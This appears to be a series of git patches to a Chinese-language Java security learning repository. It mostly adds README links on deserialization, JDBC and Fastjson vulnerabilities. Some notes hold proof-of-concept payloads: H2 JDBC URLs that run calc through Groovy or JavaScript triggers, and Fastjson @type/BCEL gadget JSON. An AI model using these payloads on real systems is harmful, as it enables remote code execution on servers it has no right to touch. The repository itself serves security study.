From c8f4e02822e739b1c150a8b45bccb3c0e990328e Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Fri, 28 Jul 2023 14:38:36 +0800 Subject: [PATCH 01/72] Update README.md metabase pre auth rce --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index cd2e54f..5ab3346 100644 --- a/README.md +++ b/README.md @@ -377,6 +377,7 @@ - 其他 - [HtmlUnit-RCE](https://siebene.github.io/2022/12/30/HtmlUnit-RCE/) - [openfire鉴权绕过漏洞原理解析(主要是学习jetty对%u002e请求的解析支持)](https://mp.weixin.qq.com/s/EzfB8CM4y4aNtKFJqSOM1w) + - [Metabase-Pre auth RCE](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) From 9cb5d45255c9f88221aecf0e835be9d0d40654c6 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Sun, 30 Jul 2023 21:23:06 +0800 Subject: [PATCH 02/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 5ab3346..8ea9115 100644 --- a/README.md +++ b/README.md @@ -28,6 +28,7 @@ - [ClassLoader(类加载机制)](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/ClassLoader(%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6)/ClassLoader(%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6).md) - [SPI学习](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/SPI/SPI.md) - [JavaAgent](http://wjlshare.com/archives/1582) +- [Java9模块化特性](https://developer.aliyun.com/article/618778) - [JMX](https://zhuanlan.zhihu.com/p/166530442) - [JMX补充学习这哥们写的不错](https://github.com/ZhangZiSheng001/02-jmx-demo) - [JDWP远程执行命令](https://www.mi1k7ea.com/2021/08/06/%E6%B5%85%E6%9E%90JDWP%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/) From 905b727d0db90939d8adfcd7a34fb47f4b764e1c Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 31 Jul 2023 13:54:55 +0800 Subject: [PATCH 03/72] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 8ea9115..d9b9fc6 100644 --- a/README.md +++ b/README.md @@ -319,9 +319,9 @@ ## 13.回显相关技术学习 - [通杀漏洞利用回显方法-linux平台](https://www.00theway.org/2020/01/17/java-god-s-eye/) - - [linux下java反序列化通杀回显方法的低配版实现](https://xz.aliyun.com/t/7307) - [Tomcat中一种半通用回显方法](https://xz.aliyun.com/t/7348) +- [半自动化挖掘request实现多种中间件回显](https://gv7.me/articles/2020/semi-automatic-mining-request-implements-multiple-middleware-echo/) From 736e69e96e1f741aa120a6c8c8d440ae47134052 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 31 Jul 2023 15:48:05 +0800 Subject: [PATCH 04/72] Update index.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 修正一处重复 --- 9.JDBC Attack/h2/index.md | 20 +++++--------------- 1 file changed, 5 insertions(+), 15 deletions(-) diff --git a/9.JDBC Attack/h2/index.md b/9.JDBC Attack/h2/index.md index 38f74a6..8f48f68 100644 --- a/9.JDBC Attack/h2/index.md +++ b/9.JDBC Attack/h2/index.md @@ -51,26 +51,16 @@ private static boolean isGroovySource(String var0) { return var0.startsWith("//groovy") || var0.startsWith("@groovy"); } ``` - -但是也不是每个项目都有Groovy - +利用 ```java - public static void main(String[] args) throws Exception { - Class.forName("org.h2.Driver"); - - String url = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" + - "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" + - "java.lang.Runtime.getRuntime().exec('open -na Calculator')\n" + - "$$\n"; - Connection conn = DriverManager.getConnection(url); - conn.close(); - } +Class.forName("org.h2.Driver"); +String groovy = "@groovy.transform.ASTTest(value={" + " assert java.lang.Runtime.getRuntime().exec(\"calc\")" + "})" + "def x"; +String url = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE ALIAS T5 AS '" + groovy + "'"; ``` +但是也不是每个项目都有Groovy,这时候可以使用js执行命令 -## 无其他依赖通过Javascript - ``` public static void main(String[] args) throws Exception { Class.forName("org.h2.Driver"); From c2e039001a63e6baef52f0208b27e37e6342ba61 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 31 Jul 2023 15:53:36 +0800 Subject: [PATCH 05/72] Update index.md --- 9.JDBC Attack/h2/index.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/9.JDBC Attack/h2/index.md b/9.JDBC Attack/h2/index.md index 8f48f68..dccf558 100644 --- a/9.JDBC Attack/h2/index.md +++ b/9.JDBC Attack/h2/index.md @@ -79,7 +79,7 @@ String url = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE ALIAS T5 AS '" + com.h2database h2 -1.4.196 +1.4.197 ``` From 9fed321aa9119a573499f386184a0044f794328a Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 31 Jul 2023 21:45:58 +0800 Subject: [PATCH 06/72] Update README.md --- README.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/README.md b/README.md index d9b9fc6..de00e46 100644 --- a/README.md +++ b/README.md @@ -360,10 +360,9 @@ - [Apache Dubbo 反序列化漏洞(CVE-2023-23638)分析及利用探索](https://yyhylh.github.io/2023/04/08/Apache%20dubbo%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2023-23638%EF%BC%89%E5%88%86%E6%9E%90%E5%8F%8A%E5%88%A9%E7%94%A8%E6%8E%A2%E7%B4%A2/) - [Apache Dubbo反序列化漏洞(CVE-2023-23638)完整利用及工程化实践](https://yyhylh.github.io/2023/05/11/Apache%20Dubbo%20%EF%BC%88CVE-2023-23638%EF%BC%89%E5%AE%8C%E6%95%B4%E5%88%A9%E7%94%A8%E5%8F%8A%E5%B7%A5%E7%A8%8B%E5%8C%96%E5%AE%9E%E8%B7%B5/) - Oracle - - [Oracle E-Business Suite Unauthenticated RCE](https://github.com/Y4tacker/JavaSec/blob/main/16.%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/CVE-2022-21587/index.md) - - [Exploiting an Order of Operations Bug to Achieve RCE in Oracle Opera](https://blog.assetnote.io/2023/04/30/rce-oracle-opera/) + - [Oracle Access Manager Pre-Auth RCE (CVE-2021–35587 Analysis)](https://testbnull.medium.com/oracle-access-manager-pre-auth-rce-cve-2021-35587-analysis-1302a4542316) - Nacos - [Aliababa Nacos hessian JRaft反序列化(文章里提到的只能打一次有误,后经过研究可以打多次)](https://y4er.com/posts/nacos-hessian-rce/ ) From a82cc6aa589c33f2107256ac51c37d1310fb570a Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Fri, 18 Aug 2023 17:11:12 +0800 Subject: [PATCH 07/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 解决markdown一处排版问题 --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index de00e46..600d952 100644 --- a/README.md +++ b/README.md @@ -376,7 +376,7 @@ - 其他 - [HtmlUnit-RCE](https://siebene.github.io/2022/12/30/HtmlUnit-RCE/) - - [openfire鉴权绕过漏洞原理解析(主要是学习jetty对%u002e请求的解析支持)](https://mp.weixin.qq.com/s/EzfB8CM4y4aNtKFJqSOM1w) + - [openfire鉴权绕过漏洞原理解析(主要是学习jetty对%u002e请求的解析支持)](https://mp.weixin.qq.com/s/EzfB8CM4y4aNtKFJqSOM1w) - [Metabase-Pre auth RCE](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) From 4eebca50f8d826f14bb1526935ec83cb30a6d00d Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Fri, 25 Aug 2023 09:39:03 +0800 Subject: [PATCH 08/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 600d952..253f586 100644 --- a/README.md +++ b/README.md @@ -378,6 +378,7 @@ - [HtmlUnit-RCE](https://siebene.github.io/2022/12/30/HtmlUnit-RCE/) - [openfire鉴权绕过漏洞原理解析(主要是学习jetty对%u002e请求的解析支持)](https://mp.weixin.qq.com/s/EzfB8CM4y4aNtKFJqSOM1w) - [Metabase-Pre auth RCE](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) + - [Ivanti Sentry Authentication Bypass](https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/) From b6ec1fb8a6f95e11264e59a91a15db52d75f19cd Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Sun, 27 Aug 2023 11:40:07 +0800 Subject: [PATCH 09/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 253f586..eb9aa71 100644 --- a/README.md +++ b/README.md @@ -135,6 +135,7 @@ - 其他 - [Java JSON解析特性分析](https://javasec.org/javaweb/JSON/FEATURE.html) + - [黑盒判断目标的fastjson版本](https://mp.weixin.qq.com/s/jbkN86qq9JxkGNOhwv9nxA) ## 4.Weblogic专区(虽然也挖了一堆,暂时不想写) - [T3协议学习](https://github.com/Y4tacker/JavaSec/blob/main/4.Weblogic专区/T3%E5%8D%8F%E8%AE%AE%E5%AD%A6%E4%B9%A0/T3%E5%8D%8F%E8%AE%AE%E5%AD%A6%E4%B9%A0.md) From 5c831e08b29b948d0a37ae1a5f4fb9f8bd8340d6 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Sun, 27 Aug 2023 11:46:22 +0800 Subject: [PATCH 10/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 利用Swing构造反序列化SSRF/RCE(JDK CVE-2023-21939) --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index eb9aa71..85a7aab 100644 --- a/README.md +++ b/README.md @@ -76,6 +76,7 @@ - [反序列化在渗透测试当中值得关注的点](https://github.com/Y4tacker/JavaSec/blob/main/2.%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%93%E5%8C%BA/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%9C%A8%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%BD%93%E4%B8%AD%E5%80%BC%E5%BE%97%E5%85%B3%E6%B3%A8%E7%9A%84%E7%82%B9/index.md) - [构造java探测class反序列化gadget](https://mp.weixin.qq.com/s/KncxkSIZ7HVXZ0iNAX8xPA) - [对URLDNS探测class的补充(为什么本地明明没有这个类却有"DNS解析")](https://github.com/Y4tacker/JavaSec/blob/main/2.%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%93%E5%8C%BA/URLDNS%E6%8E%A2%E6%B5%8Bclass%E7%9A%84%E8%A1%A5%E5%85%85/index.md) +- [利用Swing构造反序列化SSRF/RCE(JDK CVE-2023-21939)](https://github.com/Y4Sec-Team/CVE-2023-21939) - Hessian反序列化 - [Hessian 反序列化知一二](https://su18.org/post/hessian/) From 4ed07607bd7334cf90c101e84d687c6a5572d942 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Sun, 27 Aug 2023 16:45:16 +0800 Subject: [PATCH 11/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit fastjson探测class --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 85a7aab..fcbbde3 100644 --- a/README.md +++ b/README.md @@ -137,6 +137,7 @@ - 其他 - [Java JSON解析特性分析](https://javasec.org/javaweb/JSON/FEATURE.html) - [黑盒判断目标的fastjson版本](https://mp.weixin.qq.com/s/jbkN86qq9JxkGNOhwv9nxA) + - [fastjson探测class](https://github.com/safe6Sec/Fastjson) ## 4.Weblogic专区(虽然也挖了一堆,暂时不想写) - [T3协议学习](https://github.com/Y4tacker/JavaSec/blob/main/4.Weblogic专区/T3%E5%8D%8F%E8%AE%AE%E5%AD%A6%E4%B9%A0/T3%E5%8D%8F%E8%AE%AE%E5%AD%A6%E4%B9%A0.md) From b3dd517849892eaf3feb5320e2f6087785d4b5e9 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Sun, 27 Aug 2023 17:10:04 +0800 Subject: [PATCH 12/72] Update FastJson Trick.md --- .../FastJson Trick.md" | 40 ++++++++++++++++++- 1 file changed, 39 insertions(+), 1 deletion(-) diff --git "a/3.FastJson\344\270\223\345\214\272/\346\234\211\350\266\243Trick/FastJson Trick.md" "b/3.FastJson\344\270\223\345\214\272/\346\234\211\350\266\243Trick/FastJson Trick.md" index c121027..1cfc679 100644 --- "a/3.FastJson\344\270\223\345\214\272/\346\234\211\350\266\243Trick/FastJson Trick.md" +++ "b/3.FastJson\344\270\223\345\214\272/\346\234\211\350\266\243Trick/FastJson Trick.md" @@ -1,6 +1,6 @@ # FastJson Trick.md -## parse调用parseObjetc +## parse调用parseObjetc从而触发setter Fastjson反序列化的时候所用的是Parse而不是ParseObject,这里就会有一个Trick,就是在原本的@type上再嵌套一层@type,并设置为 '@type':"com.alibaba.fastjson.JSONObject", @@ -23,4 +23,42 @@ Fastjson反序列化的时候所用的是Parse而不是ParseObject,这里就 ``` ## parse触发get另一种思路 https://mp.weixin.qq.com/s?__biz=MzAxNTg0ODU4OQ==&mid=2650358489&idx=1&sn=2d1f600da6f01b644544331a844139ae&chksm=83f0273bb487ae2d85984c541adc7a928bdca396aa6ad3c0c349e2ef044558539f2f7075ad1f&mpshare=1&scene=23&srcid=1123yB78GUjwHduKmaU9BGSa&sharer_sharetime=1637650532436&sharer_shareid=18ef5175242004180f2ee4dd9c244e8a#rd +``` +{ + { + "x":{ + "@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", + "driverClassLoader": { + "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader" + }, + "driverClassName": "$$BCEL$$$l$8b$I$A$..." + } + }: "x" +} +``` +这里PoC结构上还有一个值得注意的地方在于, + +先是将 {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"……} 这一整段放到JSON Value的位置上,之后在外面又套了一层 "{}"。 +之后又将 Payload 整个放到了JSON 字符串中 Key 的位置上。 + + +## su18师傅分享的一种触发getter/setter思路 +``` +{ + "@type": "java.util.Currency", + "val": { + "currency": { + "abc": { + "@type": "java.util.Map", + "aaa": { + "@type": "org.su18.fastjson.common.Person", + "a": "s", + "age": 12, + "name": "su18" + } + } + } + } +} +``` From 5bd0790a161e1184eb29b1a000a406b383a3e9a6 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Sun, 27 Aug 2023 17:12:37 +0800 Subject: [PATCH 13/72] =?UTF-8?q?Update=20=E8=A1=A5=E5=85=85.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../\350\241\245\345\205\205.md" | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git "a/3.FastJson\344\270\223\345\214\272/\350\241\245\345\205\205.md" "b/3.FastJson\344\270\223\345\214\272/\350\241\245\345\205\205.md" index a0f6719..ebb0a95 100644 --- "a/3.FastJson\344\270\223\345\214\272/\350\241\245\345\205\205.md" +++ "b/3.FastJson\344\270\223\345\214\272/\350\241\245\345\205\205.md" @@ -4,7 +4,7 @@ -网上很多说法是与smartMatch去除下划线有关,但其实不太准确,在JavaBeanDeserializer里面维护了一个filedInfo对象,里面存了一些变量信息但是没有_bytecodes,原因是因为这个字段在方法当中没有set方法,并且没有get方法,当然多说一点在build JavaBeanInfo的时候,他会去遍历这个对象的所有方法,如果是set方法必须保证参数只能有一个,返回值要么是void要么是当前类对象,get方法则要求必须是一些集合类之类的 +在JavaBeanDeserializer里面维护了一个filedInfo对象,里面存了一些变量信息但是没有_bytecodes,原因是因为这个字段在方法当中没有set方法,并且没有get方法,当然多说一点在build JavaBeanInfo的时候,他会去遍历这个对象的所有方法,如果是set方法必须保证参数只能有一个,返回值要么是void要么是当前类对象,get方法则要求必须是一些集合类之类的 ``` Collection.class.isAssignableFrom(method.getReturnType()) || Map.class.isAssignableFrom(method.getReturnType()) || AtomicBoolean.class == method.getReturnType() || AtomicInteger.class == method.getReturnType() || AtomicLong.class == method.getReturnType() From e6a1eeddac25263d51bb3cdac3e87187fa85745d Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Sun, 27 Aug 2023 17:18:01 +0800 Subject: [PATCH 14/72] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index fcbbde3..d90a3b3 100644 --- a/README.md +++ b/README.md @@ -137,7 +137,7 @@ - 其他 - [Java JSON解析特性分析](https://javasec.org/javaweb/JSON/FEATURE.html) - [黑盒判断目标的fastjson版本](https://mp.weixin.qq.com/s/jbkN86qq9JxkGNOhwv9nxA) - - [fastjson探测class](https://github.com/safe6Sec/Fastjson) + - [fastjson探测class/如何判断是fastjson、jackson、gson](https://github.com/safe6Sec/Fastjson) ## 4.Weblogic专区(虽然也挖了一堆,暂时不想写) - [T3协议学习](https://github.com/Y4tacker/JavaSec/blob/main/4.Weblogic专区/T3%E5%8D%8F%E8%AE%AE%E5%AD%A6%E4%B9%A0/T3%E5%8D%8F%E8%AE%AE%E5%AD%A6%E4%B9%A0.md) From b99397bb5d9b38dbbff0885e8e726f54e3f32763 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Tue, 5 Sep 2023 09:33:03 +0800 Subject: [PATCH 15/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index d90a3b3..5b47a5f 100644 --- a/README.md +++ b/README.md @@ -257,6 +257,7 @@ - [Hive-RCE](https://github.com/Y4tacker/hue-hive-rce) - [2023BalckHat Asia上补充关于informix-sqli、db2、cloudspanner、avatica、snowflake的利用姿势](https://i.blackhat.com/Asia-23/AS-23-Yuanzhen-A-new-attack-interface-in-Java.pdf) - [JDBC利用链结合原生反序列化的思路](https://mogwailabs.de/en/blog/2023/04/look-mama-no-templatesimpl/) +- [JDBC Attack URL 绕过合集](https://mp.weixin.qq.com/s/lmoWKK41ZQzZOh-P26VUng) ## 10.关于JNDI的整理 From 091430d50d0e862064607e265ebad3d6d0e1f983 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Tue, 5 Sep 2023 10:29:27 +0800 Subject: [PATCH 16/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 一些国产系统的搭建 --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 5b47a5f..07cd3be 100644 --- a/README.md +++ b/README.md @@ -484,8 +484,8 @@ ## 环境 - [如何远程调试Weblogic](https://github.com/QAX-A-Team/WeblogicEnvironment) - - [使用idea进行tomcat源码调试](https://zhuanlan.zhihu.com/p/35454131) +- [一些国产系统的环境搭建问题](https://github.com/ax1sX/SecurityList/) From 8f58d5c41d12ece25c9c1ebe41eabfd1c5ea3d70 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Tue, 5 Sep 2023 10:33:18 +0800 Subject: [PATCH 17/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 07cd3be..1b3e845 100644 --- a/README.md +++ b/README.md @@ -138,6 +138,7 @@ - [Java JSON解析特性分析](https://javasec.org/javaweb/JSON/FEATURE.html) - [黑盒判断目标的fastjson版本](https://mp.weixin.qq.com/s/jbkN86qq9JxkGNOhwv9nxA) - [fastjson探测class/如何判断是fastjson、jackson、gson](https://github.com/safe6Sec/Fastjson) + - [记一次 Fastjson Gadget 寻找](https://mp.weixin.qq.com/s/dJkZuf6Ho6EK71bbnXI0EA) ## 4.Weblogic专区(虽然也挖了一堆,暂时不想写) - [T3协议学习](https://github.com/Y4tacker/JavaSec/blob/main/4.Weblogic专区/T3%E5%8D%8F%E8%AE%AE%E5%AD%A6%E4%B9%A0/T3%E5%8D%8F%E8%AE%AE%E5%AD%A6%E4%B9%A0.md) From 23ae364848f6f9dc7a012f51b035aae144d93ddd Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Wed, 6 Sep 2023 11:51:11 +0800 Subject: [PATCH 18/72] Add files via upload --- .../img/1.png" | Bin 0 -> 106851 bytes .../index.md" | 94 ++++++++++++++++++ 2 files changed, 94 insertions(+) create mode 100644 "2.\345\217\215\345\272\217\345\210\227\345\214\226\344\270\223\345\214\272/CommonCollectionsWithoutChainedTransformer/img/1.png" create mode 100644 "2.\345\217\215\345\272\217\345\210\227\345\214\226\344\270\223\345\214\272/CommonCollectionsWithoutChainedTransformer/index.md" diff --git "a/2.\345\217\215\345\272\217\345\210\227\345\214\226\344\270\223\345\214\272/CommonCollectionsWithoutChainedTransformer/img/1.png" "b/2.\345\217\215\345\272\217\345\210\227\345\214\226\344\270\223\345\214\272/CommonCollectionsWithoutChainedTransformer/img/1.png" new file mode 100644 index 0000000000000000000000000000000000000000..e779561202ea7c37c005bd22ea04e78683cc99a9 GIT binary patch literal 106851 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 